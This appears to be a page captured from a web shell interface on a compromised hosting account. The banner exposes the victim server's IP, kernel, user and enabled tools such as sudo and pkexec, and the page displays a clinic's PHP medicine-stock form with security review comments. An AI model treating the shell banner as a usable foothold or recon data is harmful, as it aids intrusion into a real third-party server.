Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 3.12.107.31
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/


Current File : /home/btiyawmy/public_html/login.easenup.in/add_Medicine_in_Stock.php
<?php
session_start();
include("dbconnection.php");
include("header.php");
include("dashboarddocument.php");
require_once('../DBManager.php');
require_once("../LoginManager.php");
require_once('../patientmanager.php');
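// Request handlers for this page: add a stock entry (POST) and delete one (GET).
// Array keys are quoted: bare keys such as $_POST[opdmedicine] are resolved as
// undefined constants, which warns on PHP 7.2 and is a fatal error on PHP 8.
if (isset($_POST['opdmedicine']))
{
	// Read a posted field as a string; missing or non-scalar values become ''.
	$field = static function ($key) {
		return (isset($_POST[$key]) && is_scalar($_POST[$key])) ? (string) $_POST[$key] : '';
	};

	// NOTE(review): admin_id is taken from a hidden form field, so the client can
	// change it. Deriving it from the logged-in session on the server would remove
	// that trust; confirm how Medicinestoknurse() uses it.
	// NOTE(review): Medicinestoknurse() is defined outside this file; verify that
	// it binds these values as query parameters rather than concatenating them.
	PatientManager::Medicinestoknurse(
		$field('admin_id'),
		$field('Category'),
		$field('DRUGS_name'),
		$field('Contain'),
		$field('Dose'),
		$field('dose_value'),
		$field('mrp'),
		$field('size'),
		$field('Name_brand')
	);
}

if (isset($_GET['delid']) && is_scalar($_GET['delid']))
{
	// NOTE(review): this deletes a row in response to a plain GET request, with no
	// anti-CSRF token and no authorization check visible in this file. Confirm that
	// header.php enforces login, and consider moving the action to POST with a token.

	// The id is bound as a parameter instead of being interpolated into the SQL
	// text, so request data can no longer change the structure of the statement.
	$delStmt = mysqli_prepare($con, "DELETE FROM medicine_stok WHERE medicine_id = ?");
	if ($delStmt)
	{
		$delid = (string) $_GET['delid'];
		mysqli_stmt_bind_param($delStmt, 's', $delid);
		mysqli_stmt_execute($delStmt);
		if (mysqli_stmt_affected_rows($delStmt) == 1)
		{
			echo "<script>alert('Deleted successfully..');</script>";
		}
		mysqli_stmt_close($delStmt);
	}
}
?>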
<!DOCTYPE html>
<html>  <head>
    <title>Medicine in Stock</title>
   
  </head>
  <body>
      
   
          
         <div class="content-wrapper">
    <!-- Content Header (Page header) -->
    <section class="content-header">
    
                   <form name="opdmedicine" method="post">
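                       <?php
// Emits the hidden admin_id field: looks up the site_users row for the current
// user's type and writes its entered_by value into the form.
// NOTE(review): dbconnection.php is pulled in with include (not include_once) a
// second time here; presumably it re-creates $con — confirm that is intended.
include("dbconnection.php");
require_once('../DBManager.php');
require_once('../LoginManager.php');
$narayan=LoginManager::currentUser();
$usertype=LoginManager::getUserTypeByuname("$narayan");

// Only the column that is rendered is selected, and the lookup value is bound as
// a parameter rather than interpolated into the SQL text.
$userStmt = mysqli_prepare($con, "SELECT entered_by FROM site_users WHERE userno = ?");
if ($userStmt)
{
	$userno = (string) $usertype;
	mysqli_stmt_bind_param($userStmt, 's', $userno);
	mysqli_stmt_execute($userStmt);
	mysqli_stmt_bind_result($userStmt, $enteredBy);
	if (mysqli_stmt_fetch($userStmt))
	{
		// ENT_QUOTES is required because the attribute below is single-quoted.
		$enteredBySafe = htmlspecialchars((string) $enteredBy, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
     echo "
<input type='hidden' value='$enteredBySafe' name='admin_id' >
";
	}
	mysqli_stmt_close($userStmt);
}
?>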

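<?php
// Renders the stock-entry form fields, pre-filled from the medicinede row whose
// id is given in the query string.
// NOTE(review): dbconnection.php is included again here with include (not
// include_once); presumably it re-creates $con — confirm that is intended.
include("dbconnection.php");

	// A missing or non-scalar id is treated as '', which simply matches no row.
	$medId = (isset($_GET['id']) && is_scalar($_GET['id'])) ? (string) $_GET['id'] : '';

	// Only the three columns that are rendered are selected, and the id is bound
	// as a parameter instead of being interpolated into the SQL text.
	$medStmt = mysqli_prepare($con, "SELECT Category, DRUGS, Dose FROM medicinede WHERE id = ?");
	if ($medStmt)
	{
		mysqli_stmt_bind_param($medStmt, 's', $medId);
		mysqli_stmt_execute($medStmt);
		mysqli_stmt_bind_result($medStmt, $rowCategory, $rowDrugs, $rowDose);
		while(mysqli_stmt_fetch($medStmt))
		{
			// Database values are HTML-escaped before being written into the page;
			// ENT_QUOTES is required because the attributes below are single-quoted.
			$categorySafe = htmlspecialchars((string) $rowCategory, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
			$drugsSafe = htmlspecialchars((string) $rowDrugs, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
			$doseSafe = htmlspecialchars((string) $rowDose, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
     echo "
				<label>Category</label>
				<select onchange='cotegory(this.value)' class='form-control' name='Category' id='Category'>
    <option value='$categorySafe'>$categorySafe </option>
    <option value='Injectable'>Injectable </option>
      <option value='IV Fluid'>IV Fluid </option>
    <option value='Capsule'>Capsule </option>
     <option value='Tablet'>Tablet </option>
         <option value='Syrup'>Syrup </option>
             <option value='Powder'>Powder </option>
                         <option value='Ointment'>Ointment</option>
                           <option value='Drop'>Drop</option>
                                <option value='Solution'>Solution</option>
                                    <option value='Patch'>Patch</option>
    </select>

    <label>Name of Medicine</label>
				<input type='text' onkeyup='this.value = this.value.toUpperCase();' placeholder='Name of Medicine' value='$drugsSafe' name='DRUGS_name' id='DRUGS_name' class='form-control' />
				
<div id='divct'>
    
    <label>Dose</label>
				<input type='text'  placeholder='In mg' value='$doseSafe' name='Dose' id='dose' class='form-control' />
				
				
					<label>Packaging Size</label>
				
				<input type='text' placeholder='Packaging Size' name='size' id='size' class='form-control' />

					Price Per 
				<input type='TEXT'  step='0.01' placeholder='price' name='mrp' id='mrp' class='form-control' />
				
			
</div>

<label>Name of Brand</label>
				
				<input type='text'  onkeyup='this.value = this.value.toUpperCase();' placeholder='Name of Brand' name='Name_brand' id='Name_brand' class='form-control' />
				
				
					<label>Contain</label>
			
				<input type='text'  onkeyup='this.value=this.value.toUpperCase();' placeholder='Contain' name='Contain' id='Contain' class='form-control' />
				
				";
		}
		mysqli_stmt_close($medStmt);
	}
		?>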

       <input type='submit' value='Add' name='opdmedicine'>
      </form>
         
   </div>   </div>   </div>
   <table id="example2"  id ="demo" class="table table-bordered table-hover">
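<?php
		// Opens the table body only when a matching addaspatient row exists. The row
		// is used purely as an existence check, so the query selects a constant.
		// NOTE(review): the closing </tbody> after this block is emitted
		// unconditionally, so the markup is unbalanced when no row matches.
		$prescriptionId = (isset($_GET['prescriptionid']) && is_scalar($_GET['prescriptionid'])) ? (string) $_GET['prescriptionid'] : '';
		$patientId = (isset($_GET['patientid']) && is_scalar($_GET['patientid'])) ? (string) $_GET['patientid'] : '';

		// Both identifiers are bound as parameters instead of being interpolated
		// into the SQL text.
		$patStmt = mysqli_prepare($con, "SELECT 1 FROM addaspatient WHERE prescriptionid = ? AND patientid = ? LIMIT 1");
		if ($patStmt)
		{
			mysqli_stmt_bind_param($patStmt, 'ss', $prescriptionId, $patientId);
			mysqli_stmt_execute($patStmt);
			mysqli_stmt_bind_result($patStmt, $rowExists);
			if(mysqli_stmt_fetch($patStmt))
			{
            echo " <tbody>
                    
          
     ";
			}
			mysqli_stmt_close($patStmt);
		}
?>  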
   </tbody>
</table> 
            <script>

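 function cotegory(ctid)
{
	// Fetches the dose/packaging fields for the selected category and swaps them
	// into the #divct container.
	//   ctid - the category value taken from the <select>.
	// The request object is declared locally; the original assigned to an
	// undeclared name, which created an implicit global shared by every call.
	var xmlhttp;
	if (window.XMLHttpRequest) {
		// code for IE7+, Firefox, Chrome, Opera, Safari
		xmlhttp = new XMLHttpRequest();
	} else {
		// code for IE6, IE5
		xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
	}
	xmlhttp.onreadystatechange = function() {
		if (this.readyState == 4 && this.status == 200) {
			// NOTE(review): the response is inserted as HTML, so loadcotegory.php
			// must escape any request or database values it echoes back.
			document.getElementById("divct").innerHTML = this.responseText;
		}
	};
	// Encode the value so characters such as '&', '#' or spaces (e.g. "IV Fluid")
	// cannot truncate the parameter or add extra ones to the query string.
	xmlhttp.open("GET","loadcotegory.php?ctid="+encodeURIComponent(ctid),true);
	xmlhttp.send();
}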
            
           
            
      // Each ".button" element opens the modal whose id is in its data-modal attribute.
      let modalBtns = Array.from(document.querySelectorAll(".button"));
      for (const btn of modalBtns) {
        btn.onclick = () => {
          const modalId = btn.getAttribute('data-modal');
          const target = document.getElementById(modalId);
          target.style.display = "block";
        };
      }
      // Each ".close" element hides the nearest enclosing ".modal".
      let closeBtns = Array.from(document.querySelectorAll(".close"));
      for (const btn of closeBtns) {
        btn.onclick = () => {
          btn.closest('.modal').style.display = "none";
        };
      }
      // Clicking an element whose class attribute is exactly "modal" (the backdrop) hides it.
      window.onclick = (event) => {
        const clicked = event.target;
        if (clicked.className === "modal") {
          clicked.style.display = "none";
        }
      };
    </script>
  </body>
</html>
